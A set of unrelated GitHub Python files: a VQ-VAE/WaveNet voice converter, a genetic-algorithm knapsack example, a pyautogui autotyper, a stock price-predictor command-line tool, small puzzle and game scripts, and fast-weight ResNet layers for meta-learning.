WaveNetModel(batch_size=batch_size,\n dilations=self.dilations,\n filter_width=self.filter_width,\n residual_channels=residual_channels,\n dilation_channels=dilation_channels,\n quantization_channels=self.quantization_channels,\n skip_channels=skip_channels,\n global_condition_channels=gc_cardinality,\n global_condition_cardinality=gc_cardinality,\n use_biases=use_biases)\n \n self.dec_scope = dec_param_scope\n \n with tf.variable_scope('embed'):\n init = tf.truncated_normal_initializer(stddev=0.01)\n# init = tf.constant_initializer(value=np.random.random((self.K, self.D)), dtype=tf.float32) \n self.embeds = tf.get_variable(\n 'embedding', [self.K, self.D], dtype=tf.float32,\n initializer=init) \n \n self.param_scope = params\n self.saver = None\n self.set_saver()\n \n def create_deconv_variables(self):\n var = None\n if self.upsampling_method.startswith('deconv'):\n var = list()\n \n tokens = self.upsampling_method.split('-')\n n_step = tokens[0].split('deconv')[1]\n\n out_channel = int(tokens[1]) if len(tokens) > 1 else 1\n\n if not n_step:\n n_step = 1\n else:\n n_step = int(n_step)\n\n assert n_step < 4\n\n height, width = self.reduced_timestep, self.D\n upscale_factor = 2 ** self.encode_level\n\n if n_step == 1:\n upscale_per_step = upscale_factor\n elif n_step == 2:\n upscale_per_step = int(np.sqrt(upscale_factor))\n elif n_step == 3:\n upscale_per_step = int(np.cbrt(upscale_factor))\n\n h = height\n in_channel = 1\n for step in range(n_step):\n with tf.variable_scope('deconv_layer_{}'.format(step)):\n layer = dict()\n\n h *= upscale_per_step\n\n kernel_size = 2*upscale_per_step - upscale_per_step%2\n# layer['filter'] = create_variable('deconv_layer_filter', [kernel_size, 1, out_channel, in_channel])\n layer['filter'] = get_bilinear_filter([kernel_size, 1, out_channel, in_channel], \n upscale_per_step, name='deconv_layer_filter')\n layer['strides'] = [1, upscale_per_step, 1, 1]\n layer['shape'] = [self.batch_size, h, width, out_channel]\n if self.use_biases:\n layer['bias'] = create_bias_variable('deconv_bias', [out_channel])\n var.append(layer) \n \n in_channel = out_channel\n out_channel = out_channel * 2\n return var\n \n def initialize(self, input_batch, sample_size=40960):\n # TODO\n self.batch_size = tf.shape(input_batch)[0]\n self.sample_size = sample_size\n self.reduced_timestep = int(np.ceil(self.sample_size / 2 ** self.encode_level))\n self.initialized = True\n\n def set_saver(self):\n if self.saver is None:\n save_vars = {('train/' + '/'.join(var.name.split('/')[1:])).split(':')[0]: var for var in\n tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.param_scope.name)}\n# for name,var in save_vars.items():\n# print(name)\n self.saver = tf.train.Saver(var_list=save_vars, max_to_keep=10)\n\n def _gc_embedding(self):\n return create_embedding_table('gc_embedding', [self.gc_cardinality, self.gc_cardinality])\n \n def create_encoder_variables(self):\n with tf.variable_scope('enc') as enc_param_scope: \n var = dict()\n\n input_channel = 1\n output_channel = self.encoding_channels\n \n var['enc_conv_stack'] = list()\n for i in range(self.encode_level):\n with tf.variable_scope('encoder_conv_{}'.format(i)):\n current = dict()\n if i < self.q_factor:\n current['filter'] = create_variable('filter', [4, 4, input_channel, output_channel[i]]) \n else:\n current['filter'] = create_variable('filter', [4, 1, input_channel, output_channel[i]]) \n if self.use_biases:\n current['bias'] = create_bias_variable('bias', [output_channel[i]])\n input_channel = output_channel[i]\n var['enc_conv_stack'].append(current)\n return var, enc_param_scope\n\n def encode(self, encoded_input_batch):\n encoded_input_batch = tf.expand_dims(encoded_input_batch, -1)\n \n out = encoded_input_batch\n\n for i, layer in enumerate(self.enc_var['enc_conv_stack']):\n kernel = layer['filter']\n if i < self.q_factor:\n out = tf.nn.conv2d(out, kernel, [1, 2, 2, 1], padding='SAME')\n else:\n out = tf.nn.conv2d(out, kernel, [1, 2, 1, 1], padding='SAME')\n \n if self.use_biases:\n out = tf.nn.bias_add(out, layer['bias'])\n\n if i < (self.encode_level-1):\n out = tf.nn.elu(out)\n# out = tf.layers.dropout(out, rate=self.drop_rate, training=self.is_training ,name='enc_dropout_%d' % (i))\n \n if self.encoding_channels[-1] > 1:\n z_e = tf.reduce_sum(out, -1)\n else:\n z_e = tf.squeeze(out, axis=-1, name='encode_squeeze')\n \n z_e = tf.nn.tanh(z_e)\n\n return z_e\n \n def upsampling(self, z_q):\n dec_input = tf.expand_dims(z_q, -1)\n initial = tf.image.resize_nearest_neighbor(dec_input, [self.sample_size, self.D])\n initial = tf.squeeze(initial, axis=-1, name='dec_input_squeeze') \n \n if self.deconv_var is not None:\n for i, layer in enumerate(self.deconv_var):\n dec_input = tf.nn.conv2d_transpose(\n dec_input,\n layer['filter'],\n layer['shape'],\n layer['strides'],\n padding='SAME',\n data_format='NHWC',\n name=None\n )\n \n if self.use_biases:\n dec_input = tf.nn.bias_add(dec_input, layer['bias'])\n \n if i < len(self.deconv_var)-1:\n dec_input = tf.layers.batch_normalization(dec_input, training=self.is_training)\n dec_input = tf.nn.tanh(dec_input)\n# dec_input = tf.nn.elu(dec_input)\n \n dec_input = tf.reduce_sum(dec_input, -1)\n dec_input = tf.add(dec_input, initial)\n else:\n dec_input = initial\n \n return dec_input\n\n def vq(self, z_e):\n _e = tf.reshape(self.embeds, [1, self.K, self.D])\n _e = tf.tile(_e, [self.batch_size, self.reduced_timestep, 1])\n\n _t = tf.tile(z_e, [1, 1, self.K])\n _t = tf.reshape(_t, [self.batch_size, self.reduced_timestep * self.K, self.D])\n\n dist = tf.norm(_t - _e, axis=-1)\n dist = tf.reshape(dist, [self.batch_size, -1, self.K])\n k = tf.argmin(dist, axis=-1)\n z_q = tf.gather(self.embeds, k)\n\n return z_q\n \n def get_condition(self, input_batch, gc=None):\n with tf.variable_scope('forward'):\n encoded_input_batch, gc = self.preprocess(input_batch, gc=gc)\n self.encoded_input_batch = encoded_input_batch\n self.gc = gc\n\n # encoding\n z_e = self.encode(encoded_input_batch)\n\n # VQ-embedding\n z_q = self.vq(z_e)\n\n # decoding\n lc = self.upsampling(z_q) \n return lc, gc\n\n def create_model(self, padded_input, gc=None):\n with tf.variable_scope('forward'):\n \n padded_encoded_input, gc = self.preprocess(padded_input, gc=gc)\n self.gc = gc\n \n # Cut off the last sample of network input to preserve causality.\n wavenet_input_width = tf.shape(padded_encoded_input)[1] - 1\n wavenet_input = tf.slice(padded_encoded_input, [0, 0, 0],\n [-1, wavenet_input_width, -1]) \n \n encoded_input = tf.slice(padded_encoded_input, \n [0, self.receptive_field, 0], \n [-1, -1, -1], name=\"remove_pad\")\n \n self.encoded_input = encoded_input\n \n # encoding\n self.z_e = self.encode(encoded_input)\n\n # VQ-embedding\n self.z_q = self.vq(self.z_e)\n\n # decoding\n lc = self.upsampling(self.z_q)\n self.lc = lc\n \n paddings = tf.constant([[0, 0], [self.receptive_field - 1, 0], [0, 0]])\n lc = tf.pad(lc, paddings, \"CONSTANT\")\n \n output = self.wavenet._create_network(wavenet_input, lc, gc)\n\n return output\n \n def generate_waveform(self, sess, n_samples, lc, gc, seed=None, use_randomness=True):\n sample_placeholder = tf.placeholder(tf.int32)\n lc_placeholder = tf.placeholder(tf.float32)\n gc_placeholder = tf.placeholder(tf.float32)\n next_sample_probs = self.wavenet.predict_proba_incremental(sample_placeholder,\n lc_placeholder,\n gc_placeholder)\n sess.run(self.wavenet.init_ops)\n\n operations = [next_sample_probs]\n operations.extend(self.wavenet.push_ops)\n \n waveform = [128] * (self.receptive_field - 2)\n waveform = np.tile(waveform, (self.batch_size, 1))\n if seed is None:\n seed = []\n for i in range(self.batch_size):\n _seed = np.random.randint(self.quantization_channels) if use_randomness else 128\n seed.append([_seed])\n \n waveform = np.hstack([waveform, seed])\n\n for i in range(waveform.shape[1]-1):\n sample = waveform[:, i]\n lc_sample = np.zeros((self.batch_size, 128))\n sess.run(operations, feed_dict={sample_placeholder: sample,\n lc_placeholder: lc_sample,\n gc_placeholder: gc})\n \n softmax_result = []\n for i in range(n_samples):\n if i > 0 and i % 10000 == 0:\n print(\"Generating {} of {}.\".format(i, n_samples))\n sys.stdout.flush()\n\n sample = waveform[:, -1]\n lc_sample = lc[:, i, :].reshape(self.batch_size, -1)\n results = sess.run(operations, feed_dict={sample_placeholder: sample,\n lc_placeholder: lc_sample,\n gc_placeholder: gc})\n \n softmax_result.append(np.expand_dims(results[0], 1))\n if use_randomness:\n sample = []\n for k in range(self.batch_size):\n _sample = np.random.choice(np.arange(self.quantization_channels), p=results[0][k,:])\n sample.append([_sample])\n else:\n sample = np.argmax(results[0], axis=1).reshape(-1, 1)\n \n waveform = np.hstack([waveform, sample])\n\n waveform = waveform[:, self.receptive_field:]\n softmax_result = np.hstack(softmax_result)\n return waveform, softmax_result\n\n def _one_hot_encode(self, input_batch):\n with tf.name_scope('one_hot_encode'):\n encoded = tf.one_hot(input_batch, depth=self.quantization_channels) \n encoded = tf.reshape(encoded, [self.batch_size, -1, self.quantization_channels])\n\n return encoded\n \n def preprocess(self, input_batch, gc=None):\n if not self.initialized:\n self.initialize(input_batch)\n \n encoded = mu_law(input_batch, quantization_channels=self.quantization_channels)\n encoded = self._one_hot_encode(encoded)\n \n # gc-embedding\n if self.use_gc and gc is not None:\n gc_embedding_table = self._gc_embedding()\n gc = tf.nn.embedding_lookup(gc_embedding_table, gc)\n gc = tf.reshape(gc, [self.batch_size, 1, self.gc_cardinality], name=\"gc_embbedding_resize\")\n\n return encoded, gc\n \n def loss_recon(self, mu_law_output, encoded_target, beta=0.25):\n encoded_output = self._one_hot_encode(mu_law_output)\n \n output = encoded_output\n target = encoded_target\n \n target = tf.slice(target, [0, 1, 0], [-1, -1, -1], name=\"loss_recon_slice_target\")\n recon = tf.nn.softmax_cross_entropy_with_logits(logits=output, labels=target)\n recon = tf.reduce_mean(recon)\n \n return recon\n \n def loss(self, output, beta=0.25):\n recon = tf.nn.softmax_cross_entropy_with_logits(logits=output, labels=self.encoded_input)\n recon = tf.reduce_mean(recon)\n \n z_q = self.z_q\n z_e = self.z_e\n\n vq = tf.reduce_mean(tf.norm(tf.stop_gradient(z_e) - z_q, axis=-1) ** 2)\n commit = tf.reduce_mean(tf.norm(z_e - tf.stop_gradient(z_q), axis=-1) ** 2)\n \n loss = (recon + vq + beta * commit)\n \n if self.is_training:\n with tf.variable_scope('backward'):\n # Decoder Grads\n decoder_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.dec_scope.name)\n decoder_grads = list(zip(tf.gradients(loss, decoder_vars), decoder_vars))\n\n # Encoder Grads\n encoder_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.enc_scope.name)\n grad_z = tf.gradients(recon, z_q)\n encoder_grads = [(tf.gradients(z_e, _var, grad_z)[0] + beta * tf.gradients(commit, _var)[0], _var)\n for _var in encoder_vars]\n\n # Embedding Grads\n embed_grads = list(zip(tf.gradients(vq, self.embeds), [self.embeds]))\n\n optimizer = tf.train.AdamOptimizer(self.lr)\n self.train_op = optimizer.apply_gradients(decoder_grads + encoder_grads + embed_grads, global_step=self.global_step)\n \n return loss, recon\n\n def load(self, sess, model):\n self.saver.restore(sess, model)\n\n def save(self, sess, logdir, step):\n model_name = 'model.ckpt'\n checkpoint_path = os.path.join(logdir, model_name)\n print('Storing checkpoint to {} ...'.format(logdir), end=\"\")\n sys.stdout.flush()\n\n if not os.path.exists(logdir):\n os.makedirs(logdir)\n\n self.saver.save(sess, checkpoint_path, global_step=step)\n print(' Done.')\n\n\nclass VoiceConverter:\n def __init__(self, model, checkpoint_path=None,\n batch_size=1, sample_size=40960, sample_rate=16000, session_config=None):\n\n self.sample_size = sample_size\n self.sample_rate = sample_rate\n self.batch_size = batch_size\n self.silence_threshold = 0.0\n\n self.model = model\n\n self.input_batch = tf.placeholder(tf.float32)\n self.gc_batch = tf.placeholder(tf.int32)\n\n self.lc, self.gc = model.get_condition(self.input_batch, self.gc_batch)\n\n self.session = tf.Session(config=session_config)\n\n if checkpoint_path is not None:\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n self.session.run(init_op)\n print('Loading checkpoint: %s' % checkpoint_path)\n self.model.load(self.session, checkpoint_path)\n\n def close(self):\n tf.reset_default_graph()\n self.sess.close()\n\n def get_condition(self, src, gc):\n n_sample = src.shape[1]\n if n_sample <= self.sample_size:\n n_frame = 1\n n_padding = self.sample_size - n_sample\n else:\n n_frame = int(math.ceil(float(n_sample) / self.sample_size))\n n_padding = self.sample_size * n_frame - n_sample\n\n src = np.pad(src, ((0, 0), (0, n_padding)), 'constant')\n src = src.reshape(self.batch_size, -1, 1)\n \n assert (src.shape[1] % self.sample_size) == 0\n\n inputs = np.split(src, n_frame, axis=1)\n\n result = []\n for input in inputs:\n lc = self.session.run(self.lc, feed_dict={self.input_batch: input, self.gc_batch: gc})\n result.append(lc)\n\n lc = np.hstack(result)\n\n return lc\n\n def convert(self, gc, src=None, file=None, use_randomness=True):\n assert src is not None or file is not None\n if src is None:\n src, _ = librosa.load(file, sr=self.sample_rate, mono=True)\n \n src = mu_law_numpy(src)\n\n n_samples = src.shape[1]\n\n a_lc = self.get_condition(src, gc)\n\n a_gc = self.session.run(self.gc, feed_dict={self.gc_batch: gc})\n a_gc = a_gc.reshape(self.batch_size, -1)\n \n seed = src[:, 0].reshape(-1, 1)\n waveform, _ = self.model.generate_waveform(self.session, n_samples, a_lc, a_gc, \n seed=seed, use_randomness=use_randomness)\n\n result = inv_mu_law_numpy(waveform, quantization_channels=self.model.quantization_channels)\n \n return result\n","repo_name":"mahdeslami11/vqvae","sub_path":"vqvae/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":22353,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"16"} +{"seq_id":"29625903622","text":"#!/usr/bin/env python3\n\"\"\"\n OptivolutionPy example project.\n Solving the Multi-dimensional knapsack problem.\n\"\"\"\n\nimport random\n\nfrom optivolution.population import Population\nfrom optivolution.chromosome import Chromosome\n\nclass MultiDimensinalKnapsack(Chromosome):\n \"\"\" Inidividual knapsack object. \"\"\"\n maximum_weight = 12210\n maximum_volume = 12\n knapsack_data = [(821, 0.8, 118), (1144, 1, 322), (634, 0.7, 166), (701, 0.9, 195),\n (291, 0.9, 100), (1702, 0.8, 142), (1633, 0.7, 100), (1086, 0.6, 145),\n (124, 0.6, 100), (718, 0.9, 208), (976, 0.6, 100), (1438, 0.7, 312),\n (910, 1, 198), (148, 0.7, 171), (1636, 0.9, 117), (237, 0.6, 100),\n (771, 0.9, 329), (604, 0.6, 391), (1078, 0.6, 100), (640, 0.8, 120),\n (1510, 1, 188), (741, 0.6, 271), (1358, 0.9, 334), (1682, 0.7, 153),\n (993, 0.7, 130), (99, 0.7, 100), (1068, 0.8, 154), (1669, 1, 289)] \n\n def __init__(self, genes_length=len(knapsack_data), genes=[]):\n super().__init__(genes_length, genes)\n \n @Chromosome.fitness_property\n def fitness(self):\n \"\"\" Defining the fitness function.\n The fitness is calculated as the total price in this problem.\n \"\"\"\n weight, volume, price = 0, 0, 0\n for i in range(self.genes_length):\n if self.genes[i]:\n weight += self.knapsack_data[i][0]\n volume += self.knapsack_data[i][1]\n price += self.knapsack_data[i][2]\n\n if weight > self.maximum_weight or volume > self.maximum_volume:\n price = 0\n\n return price\n\n def random_gene(self):\n \"\"\" Defining the random gene. \"\"\"\n return random.choice((0, 1))\n\nclass KnapscakPopulation(Population):\n tournament_sample_percentage = 2.5\n\n def random_individual(self):\n \"\"\" Defining the random individual in the population. \"\"\"\n return MultiDimensinalKnapsack()\n\ndef main():\n population = KnapscakPopulation(population_size=200)\n \n population.run(100)\n \n print(f\"Generation {population.generation_number}\")\n \n best = population.get_best_individual()\n \n # The optimal answer for this test case is\n # (3531, [0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1])\n print((best.fitness, best.genes))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mhmd-Hisham/OptivolutionPy","sub_path":"examples/multi_dimensional_knapsack.py","file_name":"multi_dimensional_knapsack.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33392151098","text":"import sys\nimport os\nimport pyautogui,time\nfrom PySide2 import QtCore, QtWidgets, QtGui\nfrom PySide2.QtWidgets import QDialog\nfrom untitled2 import *\nclass Mainspam(QtWidgets.QWidget):\n c=0\n def __init__(self,parent=None):\n QtWidgets.QWidget.__init__(self,parent)\n self.ui = Ui_spam()\n self.ui.setupUi(self)\n QtCore.QObject.connect(self.ui.busca,QtCore.SIGNAL('clicked()'),self.mostrarmensaje)\n QtCore.QObject.connect(self.ui.busca,QtCore.SIGNAL('clicked()'),self.get_text)\n def mostrarmensaje(self):\n self.ui.contador.setText(\"Tienes 5 seg\")\n def get_text(self):\n file_path=QFileDialog.getOpenFileName(self,'Open Text File',r\"C:\\\\users\",\"Text Files (*.txt)\")\n v=\"\"\n v=file_path[0]\n with open(v,\"r\")as f:\n time.sleep(6)\n for word in f:\n pyautogui.typewrite(word)\n pyautogui.press(\"enter\")\n\nif __name__==\"__main__\":\n app=QtWidgets.QApplication(sys.argv)\n myapp=Mainspam()\n myapp.show()\n sys.exit(app.exec_())\n time.sleep(5)\n","repo_name":"Alfredoht29/Python_Bot","sub_path":"MainSpam.py","file_name":"MainSpam.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33680658983","text":"from .price_predictor import quick_tomorrow\r\nfrom argparse import ArgumentParser\r\n\r\ndef main():\r\n name_library = 'price_predictor'\r\n parser = ArgumentParser(description=\"\", add_help=True, usage=\"\"\"\r\n {0} [symbol] #look for the symbol on yahoo finance\r\n {2:{1}} [--date (str)]\r\n {2:{1}} [--target (str)]\r\n {2:{1}} [--stamps (int)]\r\n {2:{1}} [--ratio (float)]\r\n {2:{1}} [--layers (int)]\r\n {2:{1}} [--epochs (int)]\r\n {0} --help\"\"\".format(name_library, len(name_library), ''))\r\n \r\n tomorrow = parser.add_argument_group(\"Get tomorrow's opening market price\",\r\n \"Specify a symbol present on yahoo finance, you can set the training to test ratio, the n° of and ephochs of the LSTM. \"\r\n \"If not specified the parameters will be set as it follows: \"\r\n \"date = '2010-07-01', \\ntarget_value = 'Open', \\ntime_stamps = 30, \\ntraining_to_test_data_ratio = 0.9, \\nn_layers = 4, \\nn_epochs = 10\")\r\n \r\n tomorrow.add_argument('symbol', type=str, nargs='*', help='Yahoo finance symbol to download the CSV with the data')\r\n tomorrow.add_argument('-d', '--date', type=str, help='Specify the date from which to start gathering data', metavar = '')\r\n tomorrow.add_argument('-t', '--target', type=str, help=\"Specify a target between Open, Close, High, Low, 'Adj Close' and Volume\", metavar = '')\r\n tomorrow.add_argument('-s', '--stamps', type=int, help='Specify how many time stamps to have in each record training sequence', metavar = '')\r\n tomorrow.add_argument('-r', '--ratio', type=float, help='Specify the ratio to split the training and test data', metavar = '')\r\n tomorrow.add_argument('-l', '--layers', type=int, help='Specify the number of layers of the neural network (if less than 2 is specified it will be 2 by default)', metavar = '')\r\n tomorrow.add_argument('-e', '--epochs', type=int, help='Specify the number of epochs of the neural network', metavar = '')\r\n\r\n args = parser.parse_args()\r\n\r\n if args.symbol == []:\r\n parser.print_help()\r\n \r\n else:\r\n #I just need the prediction, no need of the model in the command line, thus [1]\r\n quick_tomorrow(code = args.symbol[0], plot = True,\r\n start_from_date = args.date,\r\n target_value = args.target,\r\n time_stamps = args.stamps,\r\n training_to_test_ratio = args.ratio, \r\n n_layers = args.layers,\r\n n_epochs = args.epochs)[1]\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"lwdovico/price-predictor","sub_path":"price_predictor/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"1842453637","text":"# 31256KB / 40ms\nimport sys\ninput = sys.stdin.readline\nN = int(input()) # 토핑종류의 수\nA, B = map(int, input().split()) # 도우의 가격, 토핑의 가격\nC = int(input()) # 도우의 열량\nD_list = [] # 각 토핑의 열량\nfor _ in range(N):\n D_list.append(int(input()))\nD_list.sort(reverse=True)\nbest_pizza = C//A\ncalory_sum = C\nfor i in range(N):\n calory_sum += D_list[i]\n pizza = calory_sum//(A+B*(i+1))\n if best_pizza <= pizza:\n best_pizza = pizza\n else:\n break\nprint(best_pizza)","repo_name":"meeeeju/Python-Algorithm-Study","sub_path":"yang/BOJ/그리디/5545_최고의 피자.py","file_name":"5545_최고의 피자.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36630757677","text":"\n\ndef main():\n\tvect = [int(line.rstrip('\\n')) for line in open(\"input.txt\")]\n\toutput = open(\"output.txt\",\"w\")\n\toccurr = [0]\n\tcounter = 0\n\ti = 0\n\t\n\twhile True:\n\t\tcounter += vect[i%len(vect)]\n\t\toutput.write(str(counter)+'\\n')\n\t\tfor elem in occurr:\n\t\t\tif counter == elem:\n\t\t\t\tprint(counter)\n\t\t\t\treturn\n\t\toccurr.append(counter)\n\t\tprint(i)\n\t\ti = i+1\n\nif __name__ == \"__main__\":\n\tmain()\n\t\n","repo_name":"kientuong114/Advent_Of_Code_2018","sub_path":"Day1/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27784181674","text":"hecho = False\nvidasElfo=3\nvidasOrco=3\n\nwhile not hecho:\n\tsalir = input (\"Quiere salir?(s/n)\")\n\tif salir ==\"s\":\n\t\thecho = True\n\tataque = input (\"atacar con el elfo (s/n)\")\n\tif ataque == \"s\":\n\t\t#chequeo de ataque\n\t\topcion= int(input(\"elija un numero entre 1 y 9\"))\n\t\tif opcion == 1 or opcion ==3 or opcion ==5 or opcion ==7 or opcion ==9:\n\t\t\t\n\t\t\tvidasOrco = vidasOrco - 1\n\t\t\t# chequeo vidas orco\n\t\t\tif vidasOrco == 0:\n\t\t\t\tprint (\"el orco murió, HAS GANADO!!!\")\n\t\t\t\thecho = True\n\t\t\telse:\n\t\t\t\tprint (\"el orco está herido\")\n\t\telse:\n\t\t\tprint (\"no le diste - ahora te atacan....\")\n\t\t\t\n\telse:\n\t\t hecho = True\n\t\t \n\t\t\n","repo_name":"FedePodesta/Python-Introductorio","sub_path":"Python Introductorio/juego-elfo-orco-final.py","file_name":"juego-elfo-orco-final.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"29565410809","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\n\n# from torchvision import models\nfrom torchvision.models.utils import load_state_dict_from_url\nfrom torchvision.models.resnet import model_urls\n\nclass Linear_fw(nn.Linear):\n def __init__(self, in_features, out_features):\n super(Linear_fw, self).__init__(in_features, out_features)\n self.weight.fast = None\n self.bias.fast = None\n\n def forward(self, x):\n if self.weight.fast is not None and self.bias.fast is not None:\n out = F.linear(x, self.weight.fast,\n self.bias.fast)\n else:\n out = super(Linear_fw, self).forward(x)\n return out\n\n\nclass Conv2d_fw(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, bias=True):\n super(Conv2d_fw, self).__init__(in_channels, out_channels, kernel_size, stride=stride, padding=padding,\n bias=bias)\n self.weight.fast = None\n if not self.bias is None:\n self.bias.fast = None\n\n def forward(self, x):\n if self.bias is None:\n if self.weight.fast is not None:\n out = F.conv2d(x, self.weight.fast, None, stride=self.stride, padding=self.padding)\n else:\n out = super(Conv2d_fw, self).forward(x)\n else:\n if self.weight.fast is not None and self.bias.fast is not None:\n out = F.conv2d(x, self.weight.fast, self.bias.fast, stride=self.stride, padding=self.padding)\n else:\n out = super(Conv2d_fw, self).forward(x)\n\n return out\n\n\nclass BatchNorm2d_fw(nn.BatchNorm2d):\n def __init__(self, num_features):\n super(BatchNorm2d_fw, self).__init__(num_features)\n self.weight.fast = None\n self.bias.fast = None\n\n def forward(self, input):\n self._check_input_dim(input)\n\n if self.momentum is None:\n exponential_average_factor = 0.0\n else:\n exponential_average_factor = self.momentum\n\n if self.training and self.track_running_stats:\n if self.num_batches_tracked is not None:\n self.num_batches_tracked = self.num_batches_tracked + 1\n if self.momentum is None:\n exponential_average_factor = 1.0 / float(self.num_batches_tracked)\n else:\n exponential_average_factor = self.momentum\n\n \"\"\" Decide whether the mini-batch stats should be used for normalization rather than the buffers.\n Mini-batch stats are used in training mode, and in eval mode when buffers are None.\n \"\"\"\n if self.training:\n bn_training = True\n else:\n bn_training = (self.running_mean is None) and (self.running_var is None)\n\n \"\"\"Buffers are only updated if they are to be tracked and we are in training mode. Thus they only need to be\n passed when the update should occur (i.e. in training mode when they are tracked), or when buffer stats are\n used for normalization (i.e. in eval mode when buffers are not None).\n \"\"\"\n\n if self.weight.fast is not None and self.bias.fast is not None:\n return F.batch_norm(\n input,\n self.running_mean if not self.training or self.track_running_stats else None,\n self.running_var if not self.training or self.track_running_stats else None,\n self.weight.fast, self.bias.fast, bn_training, exponential_average_factor, self.eps)\n else:\n return F.batch_norm(\n input,\n self.running_mean if not self.training or self.track_running_stats else None,\n self.running_var if not self.training or self.track_running_stats else None,\n self.weight, self.bias, bn_training, exponential_average_factor, self.eps)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = Conv2d_fw(in_channels=inplanes, out_channels=planes, kernel_size=3,\n stride=stride, padding=1, bias=False)\n self.bn1 = BatchNorm2d_fw(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = Conv2d_fw(in_channels=planes, out_channels=planes, kernel_size=3,\n stride=1, padding=1, bias=False)\n self.bn2 = BatchNorm2d_fw(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass ResNetFast(nn.Module):\n def __init__(self, block, layers):\n self.inplanes = 64\n super(ResNetFast, self).__init__()\n self.conv1 = Conv2d_fw(3, 64, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = BatchNorm2d_fw(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(512 * block.expansion, 1000)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n Conv2d_fw(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=stride, bias=False),\n BatchNorm2d_fw(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n\n return x\n\n\nclass ClassifierFast(nn.Module):\n def __init__(self, backbone1, backbone2, backbone3, num_classes):\n super(ClassifierFast, self).__init__()\n self.backbone1 = backbone1\n self.backbone2 = backbone2\n self.backbone3 = backbone3\n\n self.backbones = [self.backbone1, self.backbone2, self.backbone3]\n\n self.num_classes = num_classes\n self._features_dim = 512\n\n self.head1 = Linear_fw(self._features_dim, num_classes)\n self.head2 = Linear_fw(self._features_dim, num_classes)\n self.head3 = Linear_fw(self._features_dim, num_classes)\n\n self.heads = [self.head1, self.head2, self.head3]\n\n @property\n def features_dim(self):\n \"\"\"The dimension of features before the final `head` layer\"\"\"\n return self._features_dim\n\n def forward(self, x, domain=-1):\n \"\"\"\"\"\"\n if domain == -1:\n predictions = []\n f_list = []\n for s_domain in range(3):\n f = self.backbones[s_domain](x)\n f = f.view(-1, self._features_dim)\n prediction = self.heads[s_domain](f)\n predictions.append(prediction)\n f_list.append(f)\n\n else:\n f = self.backbones[domain](x)\n f = f.view(-1, self._features_dim)\n f_list = f\n predictions = self.heads[domain](f)\n return predictions, f_list\n\n def get_parameters(self):\n \"\"\"A parameter list which decides optimization hyper-parameters,\n such as the relative learning rate of each layer\n \"\"\"\n params = [\n {\"params\": self.backbone1.parameters(), \"lr_mult\": 1.0},\n {\"params\": self.backbone2.parameters(), \"lr_mult\": 1.0},\n {\"params\": self.backbone3.parameters(), \"lr_mult\": 1.0},\n {\"params\": self.head1.parameters(), \"lr_mult\": 1.0},\n {\"params\": self.head2.parameters(), \"lr_mult\": 1.0},\n {\"params\": self.head3.parameters(), \"lr_mult\": 1.0},\n ]\n return params\n\n\ndef resnet18_fast(progress=True):\n r\"\"\"ResNet-18 